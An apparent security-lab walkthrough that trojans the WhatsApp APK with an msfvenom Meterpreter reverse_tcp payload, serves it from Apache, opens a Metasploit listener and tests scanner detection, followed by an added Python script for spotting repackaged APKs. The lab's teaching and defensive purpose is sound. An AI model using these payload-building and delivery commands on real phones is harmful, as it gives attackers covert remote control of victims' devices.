Note
The latest version of WhatsApp no longer allows this modification, as of 5-22-19. I recommend using the archived WhatsApp file, or one of these apps instead:
- Whole Foods
- Lyft
- Wells Fargo for Tablet
- Microsoft Translator
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.
On Kali, execute these commands:
apt purge apktool -y
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.4.0.jar
mv apktool_2.4.0.jar apktool.jar
mv apktool.jar /usr/bin
mv apktool /usr/bin
chmod +x /usr/bin/apktool*
apktool
You should see the "Apktool v2.4.0" help message, as shown below.
The commands may need some adjustment to work on your system. You need the output of each command to know what to put in the next one.
adb shell pm list packages | grep what
adb shell pm path com.whatsapp
adb pull /data/app/com.whatsapp-4ecBR8w_r7bateDGMM9YPg==/base.apk
The app should download, as shown below.
msfvenom -l payloads | grep android
There are only a few payloads available, as shown below.
On Kali, execute this command to find your IP address.
ifconfig
When I did it, the address was 172.16.123.180, as shown below.
On Kali, execute this command to generate the malware, replacing the IP address with your Kali system's IP address:
msfvenom -x base.apk -p android/meterpreter/reverse_tcp LHOST=172.16.123.180 -f raw -o whatspwned.apk
The malware is generated, as shown below.
On Kali, execute these commands to start a Web server and host your malicious app:
service apache2 start
cp whatspwned.apk /var/www/html
The malware is generated, as shown below.
msfconsole -q
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit begins listening on port 4444, as shown below.
Click UNINSTALL. Click OK.
Add the APK filename to the end of the IP address, as shown below. Your IP address will be different.
172.16.123.180/whatspwned.apk
A little box pops up at the bottom of the phone, saying "whatspwned.apk downloaded", as shown below. In that little box, click OPEN.
It only appears for a few seconds, so you may need to repeat the process.
On your phone, click INSTALL. Click OPEN.
Click "Play Protect", as shown below.
On the next page, at the top right, click the gear icon.
In the "Scan device for security threats" line, on the right side, click the slider to activate it, as shown below.
At the top left, click the back-arrow. At the top right, click the curved arrow icon to launch a scan.
Play Protect shows the apps it's scanned, including the Trojaned WhatsApp. Play Protect did not detect the malware, as shown below.
Scan your phone. The malware is detected, as shown below. The flag is covered by a green box in the image below.
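A scanner is not the only way to catch this. A repackaged APK cannot carry the vendor's original signature, so comparing it with a known-good copy of the same version (here, base.apk against whatspwned.apk) exposes the re-signing along with the modified code and manifest. The script below is an added example, not part of the original project; the sample archive contents and the names make_apk, ORIGINAL and REPACKED are constructed for illustration.

```python
import io
import zipfile

SIG_EXT = (".RSA", ".DSA", ".EC", ".SF")  # v1 (JAR) signature files

def apk_index(apk):
    """Map every entry in an APK (a ZIP archive) to its CRC-32."""
    with zipfile.ZipFile(apk) as z:
        return {i.filename: i.CRC for i in z.infolist()}

def diff_apks(known_good, suspect):
    """Compare a suspect APK with a known-good copy of the same version."""
    a, b = apk_index(known_good), apk_index(suspect)
    added = sorted(b.keys() - a.keys())
    removed = sorted(a.keys() - b.keys())
    changed = sorted(n for n in a.keys() & b.keys() if a[n] != b[n])
    return {
        "added": added, "removed": removed, "changed": changed,
        "resigned": any(n.startswith("META-INF/") and n.upper().endswith(SIG_EXT)
                        for n in added + removed + changed),
        "code_modified": any(n.endswith(".dex") for n in added + changed),
        "manifest_modified": "AndroidManifest.xml" in changed,
    }

def make_apk(entries):
    """Build a small in-memory ZIP standing in for an APK."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return io.BytesIO(buf.getvalue())

# Constructed sample contents, not taken from any real app.
ORIGINAL = {
    "AndroidManifest.xml": b"<manifest/>",
    "classes.dex": b"vendor code",
    "res/layout/main.xml": b"<layout/>",
    "META-INF/CERT.SF": b"vendor digests",
    "META-INF/CERT.RSA": b"vendor signature",
}
REPACKED = {
    "AndroidManifest.xml": b"<manifest><!-- extra permissions --></manifest>",
    "classes.dex": b"vendor code plus injected classes",
    "res/layout/main.xml": b"<layout/>",
    "META-INF/OTHER.SF": b"new digests",
    "META-INF/OTHER.RSA": b"new signature",
}

if __name__ == "__main__":
    print(diff_apks(make_apk(ORIGINAL), make_apk(REPACKED)))
```

To use it on real files, pass the two paths to diff_apks directly. APKs signed only with APK Signature Scheme v2 or later have no META-INF signature entries; for those, compare the certificates printed by apksigner verify --print-certs.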